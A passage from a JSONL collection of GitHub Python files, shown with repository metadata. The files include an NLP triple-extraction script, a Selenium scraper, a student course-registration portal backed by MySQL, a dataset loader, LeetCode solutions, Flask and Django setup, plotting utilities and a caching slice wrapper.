1)\n","repo_name":"mdolab/OpenAeroStruct","sub_path":"openaerostruct/aerodynamics/panel_forces_surf.py","file_name":"panel_forces_surf.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"70"}
+{"seq_id":"12681151464","text":"# coding=utf-8\nimport sys\nimport re\n\nfrom condition_identification.dict_management.dict_manage import EntityDict\nfrom condition_identification.document_parsing.html_parser import HtmlParser\nfrom condition_identification.entity_link.entity_recognizer import EntityRecognizer\nfrom condition_identification.predicate_extraction.tuple_extracter import TupleExtracter\nfrom condition_identification.syntax_analysis.sentence_analysis import HanlpSynataxAnalysis\nfrom condition_identification.word_segmentation.jieba_segmentation import Segmentation\n\nsys.path.append(\"..\")\n\nimport jieba.posseg as pseg\n\nif __name__==\"__main__\":\n # get sentences\n html_parser = HtmlParser()\n sentences = []\n with open(r'C:\\Users\\edward\\Documents\\GitHub\\NS_policy_recommendation\\res\\doc\\html\\广州南沙新区_自贸片区_促进总部经济发展扶持办法.html', 'r',\n encoding=\"UTF-8\") as html_file:\n sentences = html_parser.parse_document(html_parser.load_file(html_file))\n #print(sentences)\n\n # init jieba\n segmentation = Segmentation()\n\n # load dict\n entity_set = EntityDict()\n entity_set.load_dict(r'C:\\Users\\edward\\Documents\\GitHub\\NS_policy_recommendation\\res\\word_segmentation\\norm_dict', \"norm\")\n entity_set.load_dict(r'C:\\Users\\edward\\Documents\\GitHub\\NS_policy_recommendation\\res\\word_segmentation\\category_dict',\"category\")\n entity_set.load_dict(r'C:\\Users\\edward\\Documents\\GitHub\\NS_policy_recommendation\\res\\word_segmentation\\qualification_dict',\"qualification\")\n #print(entity_set.entity_set)\n\n for entity in entity_set.entity_word:\n segmentation.tokenizer.add_word(entity,1000)\n #print(entity)\n\n # process a sentence\n cut_sentences=[]\n for sentence in sentences:\n #wordss=segmentation.cut(sentence)\n words = segmentation.psegcut(sentence)\n cut_sentences.append(tuple(words))\n\n # recognize entity\n sentence_entity_dict = {}\n entityrecognizer = EntityRecognizer()\n for i,sentence in enumerate(cut_sentences):\n result = entityrecognizer.entity_mark(sentence,entity_set.entity_set)\n if len(result) > 0:\n sentence_entity_dict[i] = result\n #print(sentence_entity_dict)\n\n # analyse sentence and extract three-tuples\n hanlpanalysis = HanlpSynataxAnalysis()\n extracter = TupleExtracter()\n sentence_tuple = []\n sentence_spo_dict= {}\n\n for key in sentence_entity_dict:\n sentence_entity = sentence_entity_dict[key]\n\n sentence = sentences[key]\n #sentence = hanlpanalysis.sentencePreprocessing(sentence,sentence_entity)\n\n sentences[key] = sentence\n split_sentence = re.split(\"[;;。,,]\",sentence)\n spoarray=[]\n\n for one_sentence in split_sentence:\n if len(one_sentence) == 0:\n continue\n\n syntaxtuple = hanlpanalysis.parseDependency(one_sentence)\n spo_tuple = extracter.predicate_extraction(syntaxtuple,sentence_entity)\n if spo_tuple != None:\n spoarray.append(spo_tuple)\n if len(spoarray) > 0:\n sentence_spo_dict[key] = spoarray\n\n for key in sentence_spo_dict:\n print(sentences[key])\n print(sentence_spo_dict[key])\n print(\"\\n\")\n\n","repo_name":"fishersosoo/NS_policy_recommendation","sub_path":"tests/testmain.py","file_name":"testmain.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"15747700264","text":"from selenium import webdriver\nimport time\nimport os.path\nimport json\nfrom selenium.webdriver.common.by import By\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\sergs\\PycharmProjects\\Selenium\\chromedriver.exe\")\ntry:\n driver.get(url=\"https://www.marvel.com\")\n time.sleep(1)\n name = driver.title\n print(name)\n elements =driver.find_elements(By.CLASS_NAME,\"card-body__unlinked\")\n findmarvel = driver.find_elements(By.CLASS_NAME,\"card-body__headline\")\n path = os.path.join(\"baka\", \"test.txt\")\n file=open(path,\"w\")\n list=[]\n list1=[]\n for i in elements:\n if i.text:\n list.append(i.text)\n for j in findmarvel:\n if j.text:\n list1.append(j.text)\n for i,j in zip(list,list1):\n file.write(i+\" - \"+j+\"\\n\")\n file.close()\n\n\nexcept:\n print(\"error\")\n\nfinally:\n driver.close()\n driver.quit()","repo_name":"ENERGO-pixel/HomeWork","sub_path":"014_Selenium/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41109332465","text":"import mysql.connector\nimport time\n\n\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"strongpassword\",\n database=\"aims\",\n autocommit=True\n)\n\ncursor_my = mydb.cursor()\n\ndef gradesheet(user_id):\n cursor_my.execute(\"SELECT * FROM Students WHERE stu_id= %s\",(user_id,))\n no_stu=cursor_my.fetchall()\n semester=0\n sem_gpa=0\n cnt=0\n cgpa=0\n cnt_cgpa=0\n \n print (\"Student Name: \", no_stu[0][1] ,\" Student Roll No: \" ,no_stu[0][0])\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE stu_id= %s ORDER BY sem\",(user_id,))\n graded_courses= cursor_my.fetchall()\n no_courses=len(graded_courses)\n if(no_courses==0):\n print(\"No courses found in database!\")\n time.sleep(3)\n return\n for n in range(no_courses):\n if(semester!=graded_courses[n][3]):\n semester=graded_courses[n][3]\n if(cnt!=0 and sem_gpa!=0):\n print(\" SGPA\",sem_gpa/cnt)\n print(\" \")\n sem_gpa=0\n cnt=0\n print(\" Semester: \",semester)\n \n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id= %s\",(graded_courses[n][0],))\n res=cursor_my.fetchall()\n if(graded_courses[n][2]!=\"-1\"):\n cgpa=cgpa+float(graded_courses[n][2])\n sem_gpa=sem_gpa+float(graded_courses[n][2])\n cnt=cnt+1 \n print(graded_courses[n][0],res[0][1],graded_courses[n][2]) \n cnt_cgpa=cnt_cgpa+1\n else:\n print(graded_courses[n][0],res[0][1],\"W\")\n if(cnt!=0):\n print(\" SGPA: \",sem_gpa/cnt)\n else:\n print(\" SGPA: \",sem_gpa)\n print(\" \")\n cgpa=cgpa/cnt_cgpa\n print(\" Your CGPA: \",cgpa)\n input(\"\\nPress Enter to return to menu...\")\n return\n\ndef calc_cgpa(user_id):\n cursor_my.execute(\"SELECT * FROM Students WHERE stu_id= %s\",(user_id,))\n no_stu=cursor_my.fetchall()\n semester=0\n sem_gpa=0\n cnt=0\n cgpa=0\n cnt_cgpa=0\n \n # print (\"Student Name: \", no_stu[0][1] ,\" Student Roll No: \" ,no_stu[0][0])\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE stu_id= %s ORDER BY sem\",(user_id,))\n graded_courses= cursor_my.fetchall()\n no_courses=len(graded_courses)\n if(no_courses==0):\n # print(\"No courses found in database!\")\n time.sleep(3)\n return\n for n in range(no_courses):\n if(semester!=graded_courses[n][3]):\n semester=graded_courses[n][3]\n if(cnt!=0 and sem_gpa!=0):\n # print(\" SGPA\",sem_gpa/cnt)\n # print(\" \")\n sem_gpa=0\n cnt=0\n # print(\" Semester: \",semester)\n \n \n\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id= %s\",(graded_courses[n][0],))\n res=cursor_my.fetchall()\n if(graded_courses[n][2]!=\"-1\"):\n cgpa=cgpa+float(graded_courses[n][2])\n sem_gpa=sem_gpa+float(graded_courses[n][2])\n cnt=cnt+1 \n # print(graded_courses[n][0],res[0][1],graded_courses[n][2]) \n cnt_cgpa=cnt_cgpa+1\n # else:\n # print(graded_courses[n][0],res[0][1],\"W\")\n # if(cnt!=0):\n # print(\" SGPA: \",sem_gpa/cnt)\n # else:\n # print(\" SGPA: \",sem_gpa)\n print(\" \")\n cgpa=cgpa/cnt_cgpa\n print(\" Your CGPA: \",cgpa)\n time.sleep(5)\n return\n\ndef reg_course(user_id):\n student_user_id=user_id\n flag_present=0\n print(\"FLoated courses in ongoing semester are: \")\n cursor_my.execute(\"SELECT * FROM Faculty_offering\")\n offered_course=cursor_my.fetchall()\n no_offer_course=len(offered_course)\n for f in offered_course:\n \n print(f,\"\\n\")\n print(\" \")\n course_to_enroll=input(\"Enter Course_ID which you want to enroll/register: \")\n cursor_my.execute(\"SELECT * FROM Faculty_offering WHERE course_id=%s\",(course_to_enroll,))\n enroll_course=cursor_my.fetchall()\n if(len(enroll_course)==0):\n print(\"Course not offered.... Please retry...\")\n input(\"Press Enter to go to menu...\")\n return\n else:\n flag_present=1\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE stu_id=%s\",(student_user_id,))\n graded_courses=cursor_my.fetchall()\n no_of_courses=len(graded_courses)\n cnt=0\n credits_enrolled_currently=0\n credits_completed=0\n semester=0\n credits_left=16\n cursor_my.execute(\"SELECT * FROM Enrolled_students WHERE stu_id=%s\",(student_user_id,))\n enroll_courses=cursor_my.fetchall()\n no_enroll_courses=len(enroll_courses)\n for e in range(no_enroll_courses):\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id=%s\",(enroll_courses[e][0],))\n course_det= cursor_my.fetchall()\n no_of_courses=len(course_det)\n credits_enrolled_currently=credits_enrolled_currently+int(course_det[0][6],)\n print(\"You have Enrolled for \",credits_enrolled_currently,\" credits\")\n\n for c in range(no_enroll_courses):\n if(float(enroll_courses[c][2])>=4 ):\n if(float(enroll_courses[c][2])<=10):\n\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id=%s\",(enroll_courses[c][0],))\n res_courses=cursor_my.fetchall()\n semester=int(graded_courses[c][3])\n credits_completed=credits_completed+float(res_courses[0][6])\n cnt=cnt+1\n if(semester!=0):\n print(\"Completed credits till now: \",credits_completed)\n credits_left=((credits_completed/semester)*(125/100))-credits_enrolled_currently\n print(\"Credits left to enroll a course \",credits_left)\n if(credits_left<0):\n time.sleep(5)\n return\n \n\n flag_comp_pre_req=0\n #check_pre_req\n requisite=0\n cursor_my.execute(\"SELECT * FROM Course_pre_req WHERE course_id =%s\",(course_to_enroll,))\n pre_req=cursor_my.fetchall()\n no_pre_req=len(pre_req)\n for p in range(no_pre_req):\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE course_id=%s and stu_id=%s and points!=%s and points!=%s\",(pre_req[p][1],student_user_id,\"0\",\"-1\",))\n grade_course=cursor_my.fetchall()\n no_grade_course=len(grade_course)\n if(no_grade_course!=0):\n requisite=requisite+1\n if(requisite==no_pre_req):\n flag_comp_pre_req=1\n\n cursor_my.execute(\"SELECT * FROM Enrolled_students WHERE course_id=%s and stu_id=%s\",(course_to_enroll,student_user_id,))\n result= cursor_my.fetchall()\n no_res=len(result)\n if(flag_present==1):\n if(no_res==0):\n if(semester==0): #new student\n cursor_my.execute(\"INSERT INTO Enrolled_students VALUES (%s,%s,%s)\",(course_to_enroll,student_user_id,str(semester+1),))\n print(\"Course \",course_to_enroll,\" registered successfully!\")\n time.sleep(4)\n return\n else:\n print(\"You are already enrolled for the ... Cannot register again... \\n Taking to menu...\")\n time.sleep(4)\n return\n if(flag_present==1): #course present in catalog\n if(flag_comp_pre_req==1): #course pre req completed\n if(no_res==0): # course not already registered\n \n #calculate_CGPA\n cursor_my.execute(\"SELECT * FROM Students WHERE stu_id= %s\",(user_id,))\n no_stu=cursor_my.fetchall()\n semester=0\n sem_gpa=0\n cnt=0\n cgpa=0\n cnt_cgpa=0\n \n # print (\"Student Name: \", no_stu[0][1] ,\" Student Roll No: \" ,no_stu[0][0])\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE stu_id= %s ORDER BY sem\",(user_id,))\n graded_courses= cursor_my.fetchall()\n no_courses=len(graded_courses)\n if(no_courses==0):\n # print(\"No courses found in database!\")\n time.sleep(3)\n return\n for n in range(no_courses):\n if(semester!=graded_courses[n][3]):\n semester=graded_courses[n][3]\n if(cnt!=0 and sem_gpa!=0):\n # print(\" SGPA\",sem_gpa/cnt)\n # print(\" \")\n sem_gpa=0\n cnt=0\n # print(\" Semester: \",semester)\n \n \n \n\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id= %s\",(graded_courses[n][0],))\n res=cursor_my.fetchall()\n if(graded_courses[n][2]!=\"-1\"):\n cgpa=cgpa+float(graded_courses[n][2])\n sem_gpa=sem_gpa+float(graded_courses[n][2])\n cnt=cnt+1 \n # print(graded_courses[n][0],res[0][1],graded_courses[n][2]) \n cnt_cgpa=cnt_cgpa+1\n # else:\n # print(graded_courses[n][0],res[0][1],\"W\")\n # if(cnt!=0):\n # print(\" SGPA: \",sem_gpa/cnt)\n # else:\n # print(\" SGPA: \",sem_gpa)\n print(\" \")\n cgpa=cgpa/cnt_cgpa\n print(\" \")\n cursor_my.execute(\"SELECT * FROM Faculty_offering WHERE course_id=%s\",(course_to_enroll,))\n o=cursor_my.fetchall()\n if( cgpa >= float(o[0][2])):\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id=%s\",(course_to_enroll,))\n c=cursor_my.fetchall()\n if(credits_left-float(c[0][6])<0):\n print(\"You are not allowed to add more courses...\\n Credit limit reached...\\n Please Deregister a course to add new courses\\n\")\n time.sleep(4)\n return\n else:\n cursor_my.execute(\"INSERT INTO Enrolled_students VALUES (%s,%s,%s)\",(course_to_enroll,student_user_id,str(semester+1),))\n print(\"Course \",course_to_enroll,\" registered successfully\")\n time.sleep(4)\n return\n \n else:\n print(\"CGPA Eligibility criteria not fulfilled...\\n Required CGPA: \")\n print(o[0][2])\n time.sleep(4)\n return\n \n else:\n print(\"You are already enrolled for the ... Cannot register again... \\n Taking to menu...\")\n time.sleep(4)\n return\n else:\n print(\"Course Pre-requisite criteria not fulfilled \\n Cannot register...\\n Taking to menu...\")\n time.sleep(4)\n return\n\n time.sleep(5)\n return\n\ndef dereg_course(user_id):\n print(\"Your enrolled courses are:\\n\")\n cursor_my.execute(\"SELECT course_id FROM Enrolled_students WHERE stu_id = %s\",(user_id,))\n id=cursor_my.fetchall()\n for d in id:\n print(d)\n print(\"Enter Course_ID that you want to deregister\")\n c_id=input()\n cursor_my.execute(\"SELECT * FROM Enrolled_students WHERE course_id =%s and stu_id =%s\",(c_id,user_id,))\n e=cursor_my.fetchall()\n no_e=len(e)\n if(no_e!=0):\n cursor_my.execute(\"INSERT INTO Graded_courses VALUES(%s,%s,%s,%s)\",(e[0][0],e[0][1],\"-1\",e[0][2],))\n cursor_my.execute(\"DELETE FROM Enrolled_students WHERE course_id=%s and stu_id=%s\",(c_id,user_id,))\n print(\"Course deregister Success.\\n Course \",c_id,\" withdrawn\")\n else:\n print(\"Not enrolled in this course...\")\n input(\"Press Enter to return to menu\")\n return\n\n ","repo_name":"mkpreet/Db_aims_portal","sub_path":"student_functions.py","file_name":"student_functions.py","file_ext":"py","file_size_in_byte":12095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9026008970","text":"import h5py\nimport numpy as np\n\nfrom core.dataset import BaseDataset\n\nclass Dataset(BaseDataset):\n def __init__(self, data, test_only=False, user_idx=0, **kwargs):\n self.test_only = test_only\n self.user_idx = user_idx\n\n # Get all data\n self.user_list, self.user_data, self.user_data_label, self.num_samples = self.load_data(data)\n\n if self.test_only: # combine all data into single array\n self.user = 'test_only'\n self.features = np.vstack([user_data['x'] for user_data in self.user_data.values()])\n self.labels = np.hstack([user_label['x'] for user_label in self.user_data_label.values()])\n else: # get a single user's data\n if user_idx is None:\n raise ValueError('in train mode, user_idx must be specified')\n\n self.user = self.user_list[user_idx]\n self.features = self.user_data[self.user]['x']\n self.labels = self.user_data_label[self.user]['x']\n\n def __getitem__(self, idx):\n items = self.features[idx].astype(np.float32).T.reshape(1,187)\n return items, self.labels[idx]\n\n def __len__(self):\n return len(self.features)\n\n def load_data(self,data):\n '''Load data from disk or memory'''\n\n if isinstance(data, str):\n try:\n data = h5py.File(data, 'r')\n except:\n raise ValueError('Only HDF5 format is allowed for this experiment')\n\n users = []\n num_samples = data['num_samples']\n features, labels = dict(), dict()\n \n # Decoding bytes from hdf5\n decode_if_str = lambda x: x.decode() if isinstance(x, bytes) else x\n for user in data['users']:\n user = decode_if_str(user)\n users.append(user)\n features[user] = {'x': data['user_data'][user]['x'][()]}\n labels[user] = {'x': data['user_data_label'][user][()]}\n\n else:\n \n users = data['users']\n features = data['user_data']\n labels = data['user_data_label']\n num_samples = data['num_samples']\n \n return users, features, labels, num_samples","repo_name":"microsoft/msrflute","sub_path":"experiments/ecg_cnn/dataloaders/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"70"}
+{"seq_id":"28260203070","text":"class Solution:\n def selfDividingNumbers(self, left, right):\n nums = []\n for n in range(left, right+1):\n if 1<=n<10:\n nums.append(n)\n else:\n is_divide = True\n nn = n\n while n > 0:\n if n%10 == 0 or nn % (n%10) != 0:\n is_divide = False\n break\n n //= 10\n if is_divide:\n nums.append(nn)\n return nums\n\nimport unittest\nclass test_solution(unittest.TestCase):\n def test_all(self):\n s = Solution()\n self.assertEqual(s.selfDividingNumbers(1, 22), [1,2,3,4,5,6,7,8,9,11,12,15,22])\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SDRLurker/starbucks","sub_path":"20171121/20171121_2.py","file_name":"20171121_2.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33067319147","text":"from flask import Flask, g\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport json\nimport sys\nimport os\n\nconfig = {\n \"development\": False,\n \"static_folder\": \"../dist\",\n \"migrations_folder\": \"migrations\",\n \"sql_connection\": \"sqlite:///database.db\",\n \"session_duration\": 7200\n}\n\nconfig_file = \"/etc/tuber/tuber.json\"\n\nif '--config' in sys.argv:\n config_file = sys.argv[sys.argv.index('--config') + 1]\nif os.path.isfile(config_file):\n try:\n with open(config_file, \"r\") as FILE:\n config.update(json.loads(FILE.read()))\n except:\n sys.exit(\"Failed to parse configuration file: {}\".format(config_file))\n\nif 'DATABASE_URL' in os.environ:\n config['sql_connection'] = os.environ['DATABASE_URL']\n\napp = Flask(__name__)\napp.static_folder = config['static_folder']\n\nif config['sql_connection'].startswith(\"sqlite://\"):\n path = config['sql_connection'].split(\"sqlite://\")[1]\n if not os.path.isabs(path):\n config['sql_connection'] = \"sqlite://\" + os.path.join(os.path.dirname(__file__), \"../../\", path)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = config['sql_connection']\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndef init_db():\n global db\n db = SQLAlchemy(app)\n\n import tuber.csrf\n import tuber.models\n import tuber.static\n import tuber.api\n \n db.create_all()\n db.session.commit()\n Migrate(app, db)","repo_name":"bitbyt3r/tuber","sub_path":"tuber/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33654715615","text":"from Class import Embeddings\nfrom Class import Vowel\nfrom Class import Search\n\nimport argparse\n\n\ndef parse():\n parser = argparse.ArgumentParser()\n parser.add_argument('query_word', help='query word')\n parser.add_argument('embeddings', help='embeddings')\n parser.add_argument('vowel_dict', help='vowel_dict')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse()\n embeddings = Embeddings.Embeddings(args.embeddings)\n vowel = Vowel.Vowel(args.vowel_dict)\n query_word = args.query_word\n search = Search.Search(match_n=3)\n rhymes = search.search_rhyme(query_word, embeddings, vowel)\n print(rhymes)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"momongaclub/japanese_rhyme_search","sub_path":"search_rhyme.py","file_name":"search_rhyme.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"33318548925","text":"from django.urls import path\nfrom .import views\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Job-candidate-hub-API\",\n default_version='v1',\n description=\"A task for Job-candidate-hub-API\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"isayaelib@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\n\nurlpatterns = [\n path('api/add-information', views.add_candidate_information, name='add_info'),\n path('api/update-information/', views.update_candidate_information, name='update_info'),\n\n # url for api Documentation using swagger\n path('docs/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n]","repo_name":"isayaeli/Job-candidate-hub-API","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36075341779","text":"#1. Bottom-up. \nclass Solution:\n def numWays(self, n: int, k: int) -> int:\n if n == 1:\n return k\n if n == 2:\n return k * k \n \n total = [k] + [k * k] + [0] * (n-2)\n \n for i in range(2, n):\n total[i] = (k-1) * (total[i-1] + total[i-2])\n \n return total[-1]\n\n#Recurrence explanation - \n\n\"\"\"\nFor the first 1st fence, we have k options. \nFor the second fence, total ways = k * k, by permutations.\nFor n = 3 onwards, we have 2 decisions for each fence. \n 1. Paint the fence a different color than previous fence.\n For this, we have k - 1 options. so total becomes (k-1) * total[i-1]\n 2. Paint same color as previous fence.\n Number of ways = 1 * total[i-1]. But, because we have a restriction saying we can't\n paint 3 or more houses same color, we need to find in how many ways we can paint i-1th fence\n differently than i-2th fence. \n this can be done in (k - 1) * total[i-2]. Substituting that in above equation - \n 1 * total[i - 1] = 1 * (k-1) * total[i-2] = (k-1) * total[i-2].\n \n so total = (k-1) * total[i-1] + (k-1) * total[i-2]\n = (k-1) * (total[i-1] + total[i-2])\n\"\"\"","repo_name":"ggopalai/leetcode-python","sub_path":"algo/dp/paint_fence.py","file_name":"paint_fence.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74792332066","text":"import matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom os.path import join\n\n\ndef export_lagrangian_stats(lagrangian_loss, lagrangian_multipliers, lagrangian_grad_norms, violate_amount, plot_every, path):\n num_cost_types = lagrangian_multipliers[0].shape[0]\n # Export the loss, grad norm, and violate amount\n export_csv_and_plot(\"$L_\\lambda$\", 'lagrangian_loss',lagrangian_loss, path)\n export_csv_and_plot(\"gradient of $\\lambda$\", 'lagrangian_grad', lagrangian_grad_norms, path)\n export_csv_and_plot(\"amount of violation\", 'violate_amount', violate_amount, path)\n\n # Export the values of lagrangian multiplier\n value_exp_path = join(path, 'lagrangian_value')\n for i in range(num_cost_types):\n lagrangian_i_list = [multiplier[i] for multiplier in lagrangian_multipliers]\n export_csv_and_plot(\"$\\lambda_{}$\".format(i), \"lagrangian_value_{}\".format(i), lagrangian_i_list, path)\n\n\ndef export_csv_and_plot(label, filename, value_list, path):\n with open(join(path, \"{}.csv\".format(filename)), 'w') as result_csv:\n result_csv.write(concat_float_list(value_list, ',') + '\\n')\n plot_curve(value_list, join(path, filename), label)\n\n\ndef export_train_and_valid_reward(train_reward, valid_reward, plot_every, path):\n # Export the results to a csv file\n labels = ['Training reward:,', 'Validation reward:,']\n float_lists = [train_reward, valid_reward]\n with open(path + '.csv', 'w') as result_csv:\n for i in range(len(labels)):\n result_csv.write(labels[i] + concat_float_list(float_lists[i], ',') + '\\n')\n print(\"Training and valid loss saved to: {}\".format(path + '.csv'))\n # Export the plots to pdf file\n plot_train_valid_curve(train_reward, valid_reward, plot_every, path, 'Reward')\n print(\"Training and valid loss plot saved to: {}\".format(path + '_reward.pdf'))\n\n\ndef export_train_and_valid_loss(train_loss, valid_loss, train_ppl, valid_ppl, plot_every, path):\n \"\"\"\n :param train_loss: a list of float\n :param valid_loss: a list of float\n :param train_ppl: a list of float\n :param valid_ppl: a list of float\n :param plot_every: int\n :param path: str\n :return:\n \"\"\"\n # Export the results to a csv file\n labels = ['Training loss:,', 'Validation loss:,', 'Training perplexity:,', 'Validation Perplexity:,']\n float_lists = [train_loss, valid_loss, train_ppl, valid_ppl]\n with open(path + '.csv', 'w') as result_csv:\n for i in range(len(labels)):\n result_csv.write(labels[i] + concat_float_list(float_lists[i], ',') + '\\n')\n print(\"Training and valid loss saved to: {}\".format(path + '.csv'))\n # Export the plots to pdf file\n plot_train_valid_curve(train_loss, valid_loss, plot_every, path, 'Loss')\n plot_train_valid_curve(train_ppl, valid_ppl, plot_every, path, 'Perplexity')\n print(\"Training and valid loss plot saved to: {}\".format(path + '_loss.pdf'))\n print(\"Training and valid ppl plot saved to: {}\".format(path + '_perplexity.pdf'))\n\n\ndef concat_float_list(list, delimiter=','):\n return delimiter.join([str(l) for l in list])\n\n\ndef plot_curve(value_list, path, value_label):\n plt.figure()\n plt.xlabel(\"Checkpoints\")\n plt.ylabel(value_label)\n num_checkpoints = len(value_list)\n X = list(range(num_checkpoints))\n plt.plot(X, value_list, label=\"training\")\n plt.legend()\n plt.savefig(\"%s.pdf\" % (path))\n\n\ndef plot_train_curve(train_loss, plot_every, path, loss_label):\n #plt.ioff()\n title = \"Training %s for every %d iterations\" % (loss_label.lower(), plot_every)\n plt.figure()\n plt.title(title)\n plt.xlabel(\"Checkpoints\")\n plt.ylabel(loss_label)\n num_checkpoints = len(train_loss)\n X = list(range(num_checkpoints))\n plt.plot(X, train_loss, label=\"training\")\n plt.legend()\n plt.savefig(\"%s_%s.pdf\" % (path, loss_label.lower()))\n\n\ndef plot_train_valid_curve(train_loss, valid_loss, plot_every, path, loss_label):\n #plt.ioff()\n title = \"Training and validation %s for every %d iterations\" % (loss_label.lower(), plot_every)\n plt.figure()\n plt.title(title)\n plt.xlabel(\"Checkpoints\")\n plt.ylabel(loss_label)\n num_checkpoints = len(train_loss)\n X = list(range(num_checkpoints))\n plt.plot(X, train_loss, label=\"training\")\n plt.plot(X, valid_loss, label=\"validation\")\n plt.legend()\n plt.savefig(\"%s_%s.pdf\" % (path, loss_label.lower()))\n\nif __name__ == '__main__':\n train_loss = [20.1,15.3,12.3,11.0,10.0]\n valid_loss = [30.2,29.2,25.2,21.3,20.2]\n train_ppl = [10.1,5.3,2.3,1.0,1.0]\n valid_ppl = [20.2,19.2,15.2,11.3,10.2]\n\n plot_every = 4000\n path = '../exp/debug/valid_train_curve'\n export_train_and_valid_loss(train_loss, valid_loss, train_ppl, valid_ppl, plot_every, path)\n","repo_name":"kenchan0226/dual_view_review_sum","sub_path":"utils/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"72024068388","text":"import six\nfrom persistent import Persistent\nfrom itertools import islice, count\nfrom six.moves import zip as izip, map as imap\nfrom cachetools import LRUCache\nfrom zerodb.storage import prefetch\n\n\nclass Sliceable(object):\n def __init__(self, f, cache_size=1000, length=None):\n \"\"\"\n Makes a sliceable, cached list-like interface to an iterator\n :param callable f: Function which inits the iterator\n \"\"\"\n self.f = f\n self.cache = LRUCache(cache_size)\n self.stop = 0\n self.length = length\n self.iterator = iter(f())\n\n def __iter__(self):\n for i in count():\n y = self.__getitem__(i)\n yield y\n # We get StopIteration error once we're done\n\n def dictify(self):\n for obj in self.__iter__():\n if hasattr(obj, \"_p_activate\"):\n obj._p_activate()\n yield {k: v for k, v in six.iteritems(obj.__dict__) if not k.startswith(\"_\")}\n\n def __len__(self):\n if self.length is None:\n if hasattr(self.iterator, \"__len__\"):\n return len(self.iterator)\n else:\n return len(list(self.__iter__()))\n else:\n if callable(self.length):\n return self.length()\n else:\n return self.length\n\n def __getitem__(self, key):\n try:\n if isinstance(key, int) and (key >= 0):\n if key in self.cache:\n return self.cache[key]\n elif key < self.stop:\n self.stop = 0\n self.iterator = iter(self.f())\n\n delta = key - self.stop\n result = next(islice(self.iterator, delta, delta + 1))\n self.cache[key] = result\n self.stop = key + 1\n return result\n\n elif isinstance(key, slice):\n if key.start is None and key.stop is None:\n # Whole sequence is asked\n return list(self.f())\n start = key.start or 0\n step = key.step or 1\n\n indexes = count(start, step)\n index_upd = start\n while (key.stop is None or index_upd < key.stop) and index_upd in self.cache:\n index_upd += step\n\n if index_upd < self.stop and (key.stop is None or index_upd < key.stop):\n self.iterator = iter(self.f())\n result = list(islice(self.iterator, start, key.stop, step))\n for i, value in izip(indexes, result):\n self.cache[i] = value\n self.stop = i + 1 if key.stop is None else key.stop\n return result\n\n else:\n result = [self.cache[i] for i in six.moves.xrange(start, index_upd, step)]\n\n if key.stop is None:\n result_upd = list(islice(self.iterator, index_upd - self.stop, None, step))\n elif index_upd < key.stop:\n result_upd = list(islice(self.iterator, index_upd - self.stop, key.stop - self.stop, step))\n else:\n result_upd = []\n for i, value in izip(indexes, result_upd):\n self.cache[i] = value\n self.stop = key.stop\n return result + result_upd\n\n else:\n raise KeyError(\"Key must be non-negative integer or slice, not {}\"\n .format(key))\n\n except StopIteration:\n self.iterator = self.f()\n self.stop = 0\n raise\n\n def __repr__(self):\n \"\"\" Visually appealing output showing first 5 elements of the data \"\"\"\n first_el = self[:6]\n is_long = len(first_el) > 5\n reprs = [i.__repr__() for i in first_el[:5]]\n if is_long:\n reprs.append(\"...\")\n if len(reprs) <= 1:\n return \"[\" + \"\".join(reprs) + \"]\"\n else:\n l = len(reprs)\n out = []\n for i, s in 